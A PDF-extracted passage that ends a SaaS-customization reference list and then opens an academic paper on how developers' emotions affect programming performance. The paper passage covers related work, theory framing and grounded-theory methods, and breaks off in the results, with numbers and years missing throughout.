hoboken: john wiley & sons. shahin aa. . multi-dimensional customization modelling based on metagraph for saas multi-tenant applications, corr. arxiv preprint. arxiv: . . shen y, cui w, li q, shi y. . hybrid fragmentation to preserve data privacy for saas. in: eighth web information systems and applications conference. – doi . /wisa. . . 
shi y, luan s, li q, wang h. . a multi-tenant oriented business process customiza- tion system. in: international conference on new trends in information and service science. – doi . /niss. . . shrotryia vk, dhanda u. . content validity of assessment instrument for employee engagement. sage open ( ): . skulmoski gj, hartman ft, krahn j. . the delphi method for graduate research. journal of information technology education: research ( ): – doi . / . song j, zhang s, gong y, dai b. . a qos evaluation model for test-bed in the cloud computing environment. in: ieee ninth international conference on e-business engineering. piscataway: ieee, – doi . /icebe. . . stevens b, mcgrath p, yamada j, gibbins s, beyene j, breau l, camfield c, finley a, franck l, howlett a, johnston c, mckeever p, o’brien k, ohlsson a. . identification of pain indicators for infants at risk for neurological impairment: a delphi consensus study. bmc pediatrics ( ): doi . / - - - . sun w, zhang k, chen s-k, zhang x, liang h. . software as a service: an inte- gration perspective. in: krämer bj, lin k-j, narasimhan p, eds. service-oriented computing–icsoc . berlin, heidelberg: springer berlin heidelberg, – . sun w, zhang x, guo cj, sun p, su h. . software as a service: configuration and customization perspectives. in: ieee congress on services part ii (services- ). piscataway: ieee, – doi . /services- . . . sunikka a, bragge j. . what, who and where: insights into personalization. in: proceedings of the st annual hawaii international conference on system sciences (hicss ). – doi . /hicss. . . truyen e, cardozo n, walraven s, vallejos j, bainomugisha e, günther s, d’hondt t, joosen w. . context-oriented programming for customizable saas applications. ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /edoc. . http://dx.doi.org/ . / . http://arxiv.org/abs/ . http://dx.doi.org/ . /wisa. . http://dx.doi.org/ . /niss. . http://dx.doi.org/ . / http://dx.doi.org/ . /icebe. . http://dx.doi.org/ . / - - - http://dx.doi.org/ . /services- . . http://dx.doi.org/ . /hicss. . http://dx.doi.org/ . /peerj-cs. in: proceedings of the th annual acm symposium on applied computing, sac ’ . new york: acm, – doi . / . . tsai w, huang y, shao q. . easysaas: a saas development framework. in: ieee international conference on service-oriented computing and applications (soca). piscataway: ieee, – doi . /soca. . . tsai w, shao q, li w. . oic: ontology-based intelligent customization framework for saas. in: ieee international conference on service-oriented computing and applications (soca). piscataway: ieee, – doi . /soca. . . tsai w, sun x. . saas multi-tenant application customization. in: ieee seventh international symposium on service-oriented system engineering. piscataway: ieee, – doi . /sose. . . tsai w-t, zhong p, chen y. . tenant-centric sub-tenancy architecture in software-as-a-service. caai transactions on intelligence technology ( ): – doi . /j.trit. . . . van landuyt d, walraven s, joosen w. . variability middleware for multi- tenant saas applications: a research roadmap for service lines. in: proceedings of the th international conference on software product line, splc ’ . new york: acm, – doi . / . . walraven s. . middleware and methods for customizable saas. phd thesis, faculty of engineering, ku leuven. walraven s, landuyt dv, truyen e, handekyn k, joosen w. . efficient customiza- tion of multi-tenant software-as-a-service applications with service lines. 
journal of systems and software : – doi . /j.jss. . . . walraven s, truyen e, joosen w. . a middleware layer for flexible and cost- efficient multi-tenant applications. in: kon f, kermarrec a-m, eds. middleware . berlin, heidelberg: springer berlin heidelberg, – . wang s, zheng z, sun q, zou h, yang f. . cloud model for service selection. in: ieee conference on computer communications workshops (infocom wkshps). piscataway: ieee, – doi . /infcomw. . . wang y, mäntylä m, eldh s, markkula j, wiklund k, kairi t, raulamo-jurvanen p, haukinen a. . a self-assessment instrument for assessing test automation maturity. in: proceedings of the evaluation and assessment on software engineering. new york: acm, – . wynd ca, schmidt b, schaefer ma. . two quantitative approaches for esti- mating content validity. western journal of nursing research ( ): – doi . / . xiaojun r, yongqing z, lanju k. . saas template evolution model based on tenancy history. in: third international conference on intelligent system design and engineering applications. – doi . /isdea. . . xin m, levina n. . software-as-a-service model: elaborating client-side adoption factors. in: boland r, limayem m, pentland b, eds. proceedings of the th interna- tional conference on information systems. paris. yamada j, stevens b, sidani s, watt-watson j, de silva n. . content validity of a process evaluation checklist to measure intervention implementation fidelity ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / . http://dx.doi.org/ . /soca. . http://dx.doi.org/ . /soca. . http://dx.doi.org/ . /sose. . http://dx.doi.org/ . /j.trit. . . http://dx.doi.org/ . / . http://dx.doi.org/ . /j.jss. . . http://dx.doi.org/ . /infcomw. . http://dx.doi.org/ . / http://dx.doi.org/ . /isdea. . http://dx.doi.org/ . /peerj-cs. of the epic intervention. worldviews on evidence-based nursing ( ): – doi . /j. - . . .x. yang s, yoo b, jahng j. . does the saas model really increase customer benefits. asia pacific journal of information systems ( ): – . yilmaz m, o’connor rv, colomo-palacios r, clarke p. . an examination of personality traits and how they impact on software development teams. information and software technology : – doi . /j.infsof. . . . ying l, bin z, guoqi l, deshuai w, yan g. . personalized modeling for saas based on extended wscl. in: ieee asia-pacific services computing conference. piscataway: ieee, – doi . /apscc. . . zamanzadeh v, ghahramanian a, rassouli m, abbaszadeh a, alavi-majd h, nikanfar a-r. . design and implementation content validity study: development of an instrument for measuring patient-centered communication. journal of caring sciences ( ): – doi . /jcs. . . zamanzadeh v, rassouli m, abbaszadeh a, majd ha, nikanfar a, ghahramanian a. . details of content validity and objectifying it in instrument development. nursing practice today ( ): – . zhang y, liu s, meng x. . towards high level saas maturity model: methods and case study. in: ieee asia-pacific services computing conference (apscc). – doi . /apscc. . . zhang k, zhang x, sun w, liang h, huang y, zeng l, liu x. . a policy-driven approach for software-as-services customization. in: the th ieee international conference on e-commerce technology and the th ieee international conference on enterprise computing, e-commerce and e-services (cec-eee ). piscataway: ieee, – doi . /cec-eee. . . zhao s, zhang y, shen b, shen x, chen r. . mass data processing and personal- ized services in shanghai e-commerce credit evaluation platform. 
in: ieee international conference on progress in informatics and computing. piscataway: ieee, – doi . /pic. . . zia a, khan mna. . identifying key challenges in performance issues in cloud computing. international journal of modern education and computer science ( ): – . ziani d, alshehri a. . a new framework for customizing erp systems in a multi tenant saas environment. in: nd world symposium on web applications and networking (wswan). piscataway: ieee, – doi . /wswan. . .

how do you feel, developer? an explanatory theory of the impact of affects on programming performance

daniel graziotin, xiaofeng wang and pekka abrahamsson
faculty of computer science, free university of bozen-bolzano, bolzano/bozen, italy
department of computer and information science, norwegian university of science and technology, trondheim, norway

submitted june, accepted july, published august. corresponding author: daniel graziotin, daniel.graziotin@unibz.it. academic editor: philipp leitner. additional information and declarations can be found at the end of the article. copyright graziotin et al., distributed under creative commons cc-by. open access.

abstract
affects—emotions and moods—have an impact on cognitive activities and the working performance of individuals. development tasks are undertaken through cognitive processes, yet software engineering research lacks theory on affects and their impact on software development activities. in this paper, we report on an interpretive study aimed at broadening our understanding of the psychology of programming in terms of the experience of affects while programming, and the impact of affects on programming performance. we conducted a qualitative interpretive study based on face-to-face open-ended interviews, in-field observations, and e-mail exchanges. this enabled us to construct a novel explanatory theory of the impact of affects on development performance. the theory is explicated using an established taxonomy framework. the proposed theory builds upon the concepts of events, affects, attractors, focus, goals, and performance. theoretical and practical implications are given.

subjects human–computer interaction, social computing, software engineering
keywords affects, emotions, productivity, moods, psychology of programming, human aspects of software engineering, process theory, performance, interpretivism, theory building

introduction
it has been established that software development is intellectual, and it is carried out through cognitive processes (feldt et al., ; feldt et al., ; khan, brinkman & hierons, ; lenberg, feldt & wallgren, ; lenberg, feldt & wallgren, ). software development happens in our minds first, then on artifacts (fischer, ). we are human beings, and, as such, we behave based on affects as we encounter the world through them (ciborra, ). affects—which for us are emotions and moods—are the medium within which acting towards the world takes place (ciborra, ). the affects pervade organizations because they influence workers' thoughts and actions (brief & weiss, ).
affects have a role in the relationships between workers, deadlines, work motivation, sense-making, and human-resource processes (barsade & gibson, ). for the purposes of this study, we consider affect as an underlying term for emotions and moods, in line with several other authors, e.g., weiss & cropanzano ( ) and fisher ( ); see 'affect, emotion, and mood' for more information. although affects have been historically neglected in studies of industrial and organizational psychology (muchinsky, ), an interest in the role of affects on job outcomes has accelerated over the past fifteen years in psychology research (fisher & ashkanasy, ). in particular, the link between affects and work-related achievements, including performance (barsade & gibson, ; miner & glomb, ; shockley et al., ) and problem-solving processes, such as creativity (amabile et al., ; amabile, ), has been of interest for recent research. while research is still needed on the impact of affects on cognitive activities and work-related achievements in general, this link undeniably exists according to psychology research. we believe that it is important to understand the role of affects in software development processes and their impact on the performance of developers. the stance that performance and productivity are two interchangeable terms is assumed in this study, in line with fagerholm et al. ( ), petersen ( ) and meyer et al. ( ). it has been argued that software engineering has to produce knowledge that matters to practitioners (osterweil et al., ). indeed, we have shown elsewhere (graziotin, wang & abrahamsson, b) that practitioners are deeply interested in their affects while developing software, which causes them to engage in long and interesting discussions when reading related articles. we share lenberg, feldt & wallgren's ( ) view that software engineering should also be studied from a behavioral perspective. we have embraced this view in previous studies, e.g., graziotin, wang & abrahamsson ( a) and graziotin, wang & abrahamsson ( a), and have employed theories and measurement instruments from psychology to understand how affects impact software developers' performance under a quantitative strategy using experiments. however, in order to understand the human behavior behind affects and software development, there is a need to observe software developers in action and perform interviews. so far, research has not produced qualitative insights on the mechanism behind the impact of affects on the performance of developers. we have called for such studies in the past (graziotin, wang & abrahamsson, a). moreover, a lack of theory in software engineering has been recently highlighted (johnson, ekstedt & jacobson, ). thus, we conducted a study laying down the theoretical answers to the research question: how are developers' experienced affects related to performance while programming?
in this paper, we report an interpretive study of the impact of the affects of developers on software development performance. by deeply observing and openly interviewing two developers during a development cycle, we constructed an explanatory theory, called a type ii theory by gregor ( ), for explaining the impact of affects on development performance. the remainder of this paper is structured as follows. in the background section, we first briefly introduce what we mean by affects. we then review the related studies of affects and the performance of developers. then, we provide the theoretical framing of this study and the theory representation. the following section summarizes the methodology of this study by explicating our worldview and how we chose among the various options, the research design, the data analysis method, and the reliability procedures. we then report the results of our work, i.e., an explanatory theory of the impact of affects on programming performance, as well as a discussion and comparison with related work. the last section concludes the paper by providing the contribution and implications of our study, the limitations, and the suggested future work.

background
in this section, we first briefly introduce what we mean by affects, and we review the papers in the software engineering field where the affects of software developers have been taken into consideration with respect to performance.

affect, emotion, and mood
the fields of psychology have yet to agree on the definitions of affects and the related terms such as emotions, moods, and feelings (ortony, clore & collins, ; russell, ). several definitions for affects, emotions, and moods exist, to the point that ortony, clore & collins ( ) defined the study of affects as a "very confused and confusing field of study" (p. ). we are aware that some proposals have been established more than others. for example, plutchik & kellerman ( ) have defined emotions as the states of mind that are raised by external stimuli and are directed toward the stimulus in the environment by which they are raised. parkinson et al. ( ) have defined moods as emotional states in which the individual feels good or bad, and either likes or dislikes what is happening around him/her. in other words, mood has been defined as a suffused emotion, where no originating stimulus or target object can be distinguished (russell, ). the issue with the proposed definitions, including those reported above, is that hundreds of competing definitions have been produced in just a few years (kleinginna & kleinginna, ) and a consensus has yet to be reached. there are also cultural issues to be considered. for example, emotion as a term is not universally employed, as it does not exist in all languages and cultures (russell, ). distinctions between emotions and moods are clouded, because both may feel very much the same from the perspective of an individual experiencing either (beedie, terry & lane, ). as emotions and moods may feel the same from the perspective of an individual, we have adopted the stance of several researchers in the various fields (schwarz & clore, ; schwarz, ; wegge et al., ; de dreu et al., ) and employed the noun affects (and affective states) as an underlying term for emotions and moods. we do not neglect moods and emotions per se.
we opted to understand the states of mind of software developers at the affective level only, that is, "one level below" moods and emotions. the issue of defining the concepts under study is not trivial and deserves separate discussion; we point the reader to two of our recent articles (graziotin, wang & abrahamsson, c; graziotin, wang & abrahamsson, b), in which we have discussed the theoretical foundations, the various theories, and the classification frameworks for affects, emotions, and moods, and the common misconceptions that occur when studying these constructs. our choice was not unthoughtful. we have adhered to the core affect theory (russell, ; russell & barrett, ; russell, ), which employs affect as the atomic unit upon which moods and emotional experiences can be constructed. that is, in this article we do not distinguish between emotions and moods. we are interested in understanding how developers feel.

related work
lesiuk ( ) studied software engineers in a field study with a removed treatment design. removed treatment designs are part of single-group quasi-experiment designs: they allow one to test hypotheses about an outcome in the presence of the intervention and in the absence of the intervention (harris et al., ). a pre-treatment measurement is taken on a desired outcome; a treatment is provided; a post-treatment measurement is conducted; a second post-treatment measurement is conducted; the treatment is removed; and a final measurement is performed (harris et al., ). the aim of the study was to understand the impact of music listening on software design performance. the study was conducted over a five-week period. the design performance and the affects of the developers were self-assessed twice per day. for the first
during the task, the affect arousal was induced to the participants. overall, the results of the two studies provided empirical evidence for a positive correlation between the affects of software developers and their debugging performance. we also conducted two studies to understand the connection between affects and the performance of software developers. in the first study (graziotin, wang & abrahamsson, a), we recruited computer science students to investigate the relationship between the affects of software developers and their performance in terms of creativity and analytic problem-solving. in a natural experiment, the participants performed two tasks chosen from psychology research that could be transposed to development activities. the partici- pants’ pre-existing affects were measured before each task. overall, the results showed that the happiest developers are better problem solvers in terms of their analytic abilities. the second study (graziotin, wang & abrahamsson, a) was a correlation study of real-time affects and the self-assessed productivity of eight software developers while they were performing a min programming task on a real-world project. the developers’ affects and their productivity were measured in intervals of min. through the fit of a linear mixed effects model, we found evidence for a positive correlation between the affects of developers associated to a programming task and their self-assessed productivity. in this study, we called for process-based studies on software teams which “are required in order to understand the dynamics of affects and the creative performance of software teams and organizations” (p. ). müller & fritz ( ) performed a study with participants, of which were profes- sional software developers and were phd students in computer science. the participants were asked to perform two change tasks, one for retrieving stackoverflow scores and the other to let users undo more than one command in the jhotdraw program. during the graziotin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. development, the participants were observed using three biometric sensors, namely an eye tracker, an electroencephalogram, and a wearable wireless multi-sensor for physiological signals (e.g., heart rate, temperature, skin conductance). after watching a relaxing video, the participants worked on both tasks in a randomly assigned order. they were then interrupted after min of working or when they showed strong signs of emotions. during each interruption, the participants rated their affects using a psychology measurement instrument. after other min of work, the participants repeated the experiment design using the second task. finally, the participants were interviewed. overall, the study found that ( ) developers feel a broad range of affects, expressed using the two dimensional measures of valence and arousal instead of labeling the affects, ( ) the affects expressed as valence and arousal dimensions are correlated with the perceived progress in the task (evaluated using a – likert scale), ( ) the most important aspects that affect positive emotions and progress are the ability to locate and understand relevant code parts, and the mere act of writing code instead of doing nothing. on the other hand, most negative affects and stuck situations were raised by not having clear goals and by being distracted. 
so far, the literature review has shown that the number of studies regarding the affects and the performance of developers is limited. furthermore, the studies are all quantitative and toward variance theory. variance theories, as opposed to process theories, provide explanations for phenomena in terms of relationships among dependent and independent variables (langley, ; mohr, ). in variance theory, the precursor is both a necessary and sufficient condition to explain an outcome, and the time ordering among the independent variables is immaterial (pfeffer, ; mohr, ). strictly speaking, variance theory studies are hypothesis-driven studies, which aim to quantify the relationship between two variables in their base case. process research is concerned with understanding how things evolve over time and why they evolve in they way we observe (langley, ). according to langley ( ), process data consist mainly of “stories”—which are implemented using several different strategies—about what happened during observation of events, activities, choice, and people performing them, over time. mohr ( ) has contrasted process theory from variance theory by stating that the basis of explanation of things is a probabilistic rearrangement instead of clear causality, and the precursor in process theory is only a necessary condition for the outcome. in the literature review, a lack of theoretical and process-based studies was identified. for this reason, we aimed at developing a process-based theory. theoretical framework our theoretical framework was primarily based upon the affective events theory (aet) by weiss & cropanzano ( ) and the episodic process model of performance episodes by beal et al. ( ). aet has been developed as a high-level structure to guide research on how affects influence job satisfaction and job-related performance. graziotin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. in aet, the work environment settings (e.g., the workplace, the salary, promotion opportunities, etc.) mediate work events that cause affective reactions, which are interpreted according to the individuals’ disposition. affective reactions then influence work-related behaviors. work-related behaviors are divided into affect-driven behaviors and judgment-driven behaviors. affect-driven behaviors are behaviors, decisions, and judgments that have immediate consequences of being in particular emotions and moods. one example could be overreacting to a criticism. judgment-driven behaviors are driven by the more enduring work attitudes about the job and the organization (weiss & beal, ). examples are absenteeism and leaving. as weiss & beal ( ) noted ten years after publishing aet, aet has often been erroneously employed as a theoretical model to explain affective experiences at work. however, aet is a macrostructure for understanding affects, job satisfaction in the workplace, and to guide future research on what are their causes, consequences, and explanations. more specifically, aet is not a framework to explain the performance on the job, neither is it a model to explain the impact of all affects on job-related behaviors. in their conceptual paper, beal et al. ( ) provided a model that links the experiencing of affects to individual performance. beal et al. ( ) model is centered around the conceptualization of performance episodes, which relies on self-regulation of attention regarding the on-task focus and the off-task focus. 
the cognitive resources towards the focus switch is limited. affects, according to beal et al. ( ), hinder the on-task performance regardless of them being positive or negative. the reason is that affective experiences create cognitive demand. therefore, affective experiences, according to this model, influence the resource allocation towards off-task demand. theory construction and representation interpretive research is often conducted when producing theories for explaining phe- nomena (klein & myers, ). gregor ( ) examined the structural nature of theories in information systems research. gregor proposed a taxonomy to classify theories with respect to how they address the four central goals of analysis and description, explanation, prediction, and prescription. we employed the widely established gregor ( ) work as a framework for classifying and expressing our proposed theory. a type ii—or explanation—theory provides explanations but does not aim to predict with any precision. the structural components of a type ii theory are ( ) the means of representation—e.g., words, diagrams, graphics, ( ) the constructs—i.e., the phenomena of interests, ( ) the statements of relationships—i.e., showing the relationships between the constructs, ( ) the scope—the degree of generality of the statements of relationships (e.g., some, many, all, never) and statements of boundaries, and ( ) the causal explanations which are usually included in the statements of relationship. while conducting this study, we ensured the constructed theory was composed of these elements. our study attempts to broaden our understanding of topics that are novel and unexplored in our field. rindova ( ) warned us that “novelty, however, comes at a cost: novel things are harder to understand and, especially, to appreciate” (p. ). graziotin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. therefore, we have to proceed carefully in the theory building process. the risk is to get lost in complex interrelated constructs in a confused and confusing field of study (ortony, clore & collins, ) brought in the complicated, creative domain that is software engineering. furthermore, barsade & gibson ( ) advised researchers that, when understanding emotion dynamics, the bigger is the team under observation, the more complex and complicated are the team dynamics. bigger teams have complicated, and even historical, reasons that are harder to grasp—triggering a complex, powerful network of affects (barsade & gibson, ). therefore, there is the need to keep the phenomenon under study as simple as possible. for novel theory development, philosophers and economists often—but not always—draw from their own personal observation and reasoning, while still being able to offer a sound empirical basis (yeager, ). theorizing from the ivory tower can complement the scientific method by offering insights and discovering necessary truths (yeager, ), to be further expanded by empirical research. our empirical stance makes us eager to jump to data and start theorizing; yet, we need to take some precautionary measures before doing this. when novel theories are to be developed in new domains, such as software engineering, a small sample should be considered (järvinen, ). a small sample enables the develop- ment of an in-depth understanding of the new phenomena under study (järvinen, ) and to avoid isolation in the ivory tower. 
our research follows carefully järvinen ( ) recommendations, which is reflected in our study design. weick ( ) classic article is of the same stance by reporting that organizational study theories are approximations of complex interrelated constructs of human nature that often have small samples. those works are often seen as substitutes of theory studies, but they often represent “struggles in which people intentionally inch toward stronger theories” (ibid, p. ). such struggles are needed when a phenomenon is too complex to be captured in detail (weick, ). these issues were taken into account when we designed our study, which is demonstrated in the following section. methodology we describe our research as a qualitative interpretive study, which was based on face-to- face open-ended interviews, in-field observations, and e-mail exchanges. given the aim of the study, there was the need to make sense of the developers’ perceptions, experiences, interpretations, and feelings. we wanted to conduct open-ended interviews where the realities constructed by the participants are analyzed and reconstructed by the researcher. our epistemological stance for understanding these social constructs and interactions has been interpretivism, which we make coincide with social constructivism in line with other authors (easterbrook et al., ). interpretive data analysis has been defined succinctly by geertz ( ) as “really our own constructions of other people’s constructions of what they and their compatriots are up to” (p. ). interpretivism is now established in information systems research (walsham, ), but we see it still emerging in software engineering research. graziotin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. design as per our chosen design, the participants could be free to undergo the development of the system in any way, method, practice, and process they wished to employ. our study comprised of regular scheduled face-to-face meetings with recorded interviews, impromptu meetings which could be called for by the participants themselves, e-mail exchanges, in-field observations, and a very short questionnaire right after each commit in the git system (explained in section reliability). therefore, the participants had to be aware of the design itself, although they were not informed about the aims of the study. the participants’ native language is italian, but they have been certified as proficient english speakers. the first author of the present article employs italian as first language as well, and he was the reference person for the participants for the duration of the entire study. the other two authors of the present article have been certified as proficient and upper intermediate in italian. the choice for the design of the study was therefore to conduct the interviews in italian, as the native language let the participants express their opinion and feelings in the richest, unfiltered way (van nes et al., ). the interviews were subsequently transcribed in english as suggested by the common research practices (van nes et al., ; squires, ), but the present case had the added value that the authors could validate the transcripts with the participants over the course of the study, given their advanced proficiency in english. 
the in-field observations were performed by two of the present authors, and the personal communications such as e-mails or some impromptu meetings were exchanged between the first author of the study and the participants. the coding activities have been a collaborative effort among all the authors of this study. in order to keep the study design and results as simple as possible and to provide precise answers to the research question, in line with what we stated in the section theory construction and representation, we observed activities that produced code. other artifacts such as requirements and design were not taken into consideration. furthermore, our strategy to limit the complex network of triggered affects was to group and study them into the two well-known dimensions of positive and negative affects (watson, clark & tellegen, ), which assign the affects—including those perceived as neutral—in a continuum within the two dimensions. our design took into account ethical issues, starting with a written consent to be obtained before starting any research activity. the consent form informed the participants of our study in terms of our presence, activities, data recordings, anonymity and data protection, and that their voluntary participation could be interrupted at any time without consequences. they were also informed that any report of the study had to be approved by them in terms of their privacy, dignity protection, and data reliability before it was disclosed to any third party. furthermore, as an extra measure, any additional, personal data coming from e-mail exchanges and some impromptu meetings with a single author was approved by the participants before inclusion to the study data. graziotin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. data analysis grounded theory has been indicated to study human behavior (easterbrook et al., ), and it is suitable when the research has an explanatory and process-oriented focus (eisenhardt, ). qualitative data analysis techniques from grounded theory responded to our needs (langley, ). we are aware that there has been some heated debate regarding which, between glaser & strauss ( ) or corbin & strauss ( ), is the grounded theory qualitative strategy (creswell, ) or if it can be employed merely as a tool to analyze qualitative data (kasurinen, laine & smolander, ). heath & cowley ( ) comparison study concludes that researchers should stop debating about grounded theory, select the method that best suits their cognitive style, and start doing research. we agree with them and adopted charmaz ( ) social constructivist grounded theory approach as a tool to analyze qualitative data coming from face-to-face open-ended interviews, in-field observations, and e-mail exchanges. the adaption of grounded theory by charmaz ( ) has merged and unified the major coding techniques into four major phases of coding, which are initial coding, focused coding, axial coding, and theoretical coding. the four coding phases have been adopted in the data analysis process of this study. charmaz ( ) has often remembered her readers that no author on grounded theory methodology has ever really offered criteria for establishing what we should accept as a coding family, and that the coding phases are often overlapping, iterative and not strictly sequential within each iteration. this is true also for this study. an exemplar case of our coding activities is shown in fig. . 
the figure is divided into four columns. the first column provides an interview excerpt. the remaining columns show the intermediate results of the coding activities. the initial coding phase should stick closely to the data instead of interpreting the data. the researchers should try to see the actions in each segment of data, and avoid applying pre-existing categories to it. therefore, charmaz ( ) has suggested coding the data with a line-by-line approach so that the context is isolated as much as possible, and coding the data as actions. to help focus on the data as actions, it has been suggested to use gerunds. for example, in fig. the second column shows the initial codes assigned to an interview snippet. the second coding phase is the focused coding. focused coding means that the most significant or frequent (or both) codes which appeared in the initial coding are employed to sift through larger amounts of data, like paragraphs, speeches, and incidents. this phase is about deciding which initial codes make the most analytic sense for categorizing the data. however, it is also possible to create umbrella codes as substitutes for other codes. during focused coding, the codes become more directed, selective, and conceptual. for example, as shown in fig. , the initial code “improving productivity through the use of st” was further abstracted as “improving productivity through a tool.” the third coding phase is the axial coding. the axial coding phase was proposed by strauss & corbin ( ). as synthesized by charmaz ( ), the axial coding process follows the development of major categories, relates categories to subcategories, and relates them to each other. if during initial and focused coding the data is fractured into pieces, the axial coding phase brings the data back together again. in this phase, the properties and the dimensions of a category are specified. the fourth column of fig. shows an iteration of axial coding (figure caption: example of coding phases for this study). the fourth coding phase is the theoretical coding. theoretical coding was introduced by glaser ( ). as synthesized by charmaz ( ), the theoretical coding phase specifies how the codes from the previous phases relate to each other as hypotheses to be integrated into a theory. it would be impractical to show the steps and complete examples of axial and theoretical coding, as they would need several interview excerpts and resulting codes (charmaz, ). what we could demonstrate in fig. was that the interview excerpt was further coded in the later coding phases and became part of the evidence to support the key concepts, such as affect, and their components, as shown in the fourth column. the overlapping of different categories over the same snippets indicated the potential linkage among them, which became the basis for developing the model proposed in this study. reliability here, we describe our procedures for enhancing the reliability of the gathered data and the results. the data was gathered using multiple sources. each interview was accompanied by handwritten notes, recordings, and related subsequent transcriptions. all in-field observations were accompanied by audio recordings after obtaining permission of the
we wrote memos during the study. the transcriptions and the coding phases were conducted using atlas.ti . , which is a recognized instrument for such tasks. in order to make the participants focus on their affects and recall how they felt during performance episodes, we asked them to fill out a very short questionnaire at each git commit. the questionnaire was the self-assessment manikin (bradley & lang, ), which is a validated pictorial questionnaire to assess affects. we employed the questionnaire in a previous study (graziotin, wang & abrahamsson, a) as it proved to be quick (three mouse clicks for completing one) and not invasive. we employed the gathered data to triangulate the observational data and the interview data during each interview. if there was disagreement between the qualitative data (e.g., several positive affective episodes but negative quantitative results), we asked for further clarification from the participants to solve the discrepancies. as a further action to enhance reliability, but also ethicality of the study, we asked the participants to individually review the present paper in three different times. the first review session happened in the initial drafts of the paper when we solely laid down the results of the study. the second review session happened right before submitting the article. the third review session happened before submitting a revised version of the present article. for the reviews, we asked the participants to evaluate the results in terms of their own understanding of the phenomena under study and the protection of their identity and dignity. because of their valuable help, the proposed theory is shared with them and further validated by them. results and discussion the study was set in the context of a web- and mobile-based health-care information systems development between july and september . two software developers, who were conducting a semester-long real-world project as a requirement for their bsc theses in computer science, were put in a company-like environment. both developers, who we shall call p and p for anonymity reasons, were male. p was years old and p was years old. they both had about five years of experience developing web and mobile systems. p and p had their own spacious office serving as an open space, their own desks and monitors, a fast internet connection, flip-charts, a fridge, vending machines, and / access to the building. the developers accepted to work full time on the project as their sole activity. they were instructed to act as if they were in their own software company. indeed, the developers were exposed to real-world customers and settings. the customers were the head of a hospital department, a nurse responsible for the project, and the entire nursing department. the development cycle began with a first meeting with the customer, and it ended with the delivery of a featureful first version of the working software. it is beneficial to the reader to provide a brief summary of the main events, which have been extracted from our in-field memos. during the first week, p had to work on the project without p . p failed to show up at work. during the first days, p gave brief explanations about the absence, e.g., housework or sickness. however, the explanations stopped quickly, and p stopped answering to text messages and phone calls. at the graziotin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. 
beginning of the second week, p showed up at work. p had some private issues, which brought some existential crisis. p was initially reluctant to welcome p in the development, as all the code so far was p ’s creation. the first two days of collaboration brought some tension between the team members, crippled experimentation with the code, and a shared loss of project vision. on the third day of the second week, the team tensions exploded in a verbal fight regarding the data structures to be adopted. at that point, one of the present authors was involved in the discussion. the researcher invited the participants to express their opinion and acted as mediator. a decision was eventually made. the initial tensions between the developers began to vanish, and the work resumed at a fair pace. at the end of the second week, p and p had a further requirements elicitation session with the customer represented by the head nurse. the development appeared to be back at full speed, and a full reconciliation could be observed between the participants. the progresses succeeded one day after another, and the fully working prototype was demoed and tested during the sixth week. face-to-face open-ended interviews happened at the beginning of the project during scheduled meetings and impromptu shorter meetings called by the researchers or by the participants. the impromptu meetings were held mostly because of trivial issues, like casual chatting which turned into a proper interview. only in one case was an impromptu meeting called by p when he finally came back to work. we also did not distinguish between the data coming from the scheduled meetings and the impromptu meetings. the interviews were open-ended and unstructured, but they all began with the question how do you feel? in-field observations happened on an almost daily basis. the participants were informed if they were recorded. we recorded a total of min of interviews. finally, data was gathered via the exchange of thirteen emails. the transcripts of the interviews were completed immediately after the interviews were concluded. the initial coding phase produced unique codes. the focused coding phase was focused on the individual’s experiences of the development process, and it produced codes. figure provides an example of our coding activities. the axial coding and the- oretical coding produced six themes, which are explained in this section. inconsistencies between the qualitative data and the data from the self-assessment manikin questionnaire happened three times during the entire study. all three discrepancies were minor, and they were immediately solved upon clarification from the participants. for example, in one case the participant p reported low values of valence and arousal, and a neutral value for dominance. during the interview, p often stated that he had a frustrating day, but there were no mentions of low-arousal negative affects. when asked to explain how the self-assessment manikin values were representative of the work day, the participant added that he felt low esteem, which was caused by episodes of frustration. overall, p was unexcited and lost over the day; thus the reported low value for arousal. this section provides the proposed theory. the theory is represented in fig. . we describe the discovered themes and categories (boxes) and their relationships (arrows). 
while type ii theories are not expected to discuss causal explanations in terms of direction and magnitude (gregor, ), we offer them as they were interpreted from the data. each graziotin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure a theory of the impact of the affects on programming performance. relationship is accompanied by a verb, which describes the nature of the relationship. where possible, we precede the verb with some plus (+) or minus (−) signs. a plus (minus) sign indicates that we theorize a positive (negative) effect of one construct to another. a double plus (double minus) sign indicates that we theorize a strong positive (strong negative) effect of one construct to another with respect to a proposed weaker alternative. the reader should bear in mind that our theorized effects are not to be strongly graziotin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. interpreted quantitatively. that is, a double plus sign is not the double of a single plus sign or an order more of magnitude of a single plus sign. every entity and relationship is supplied with interview quotes, codes, and related work. events the events are perceived from the developer’s point of view as something happening. events resemble psychological objects, which were defined by russell ( ) as “the person, condition, thing, or event at which a mental state is directed” (p. ) but also at which a mental state is attributed or misattributed. events may be non work-related—e.g., family, friends, house, hobbies—or they may be work-related—e.g., the working environment, the tools, and the team members. the interview quotes and , and in-field memo are examples of work-related events, while interview quote is not related to work. . “suddenly, i discovered google plus bootstrap, which is a bootstrap theme resembling google+. [i implemented it and] it was easy and looking good.”—p . “i found a typo in the name of the key which keeps track of the nurse id. the bug was preventing a correct visualization of patient-related measurements. fixing the bug is very satisfying, because i can now see more results on the screen.”—p . p , talking to p and visibly irritated “again this? you still have not understood the concept! it is <component name>that is static, while the measurement changes!” . “this morning i received a message with some bad news related to my mother. i imme- diately desired to abandon development in order to solve the possible issue. the focus was more on that issue than on any 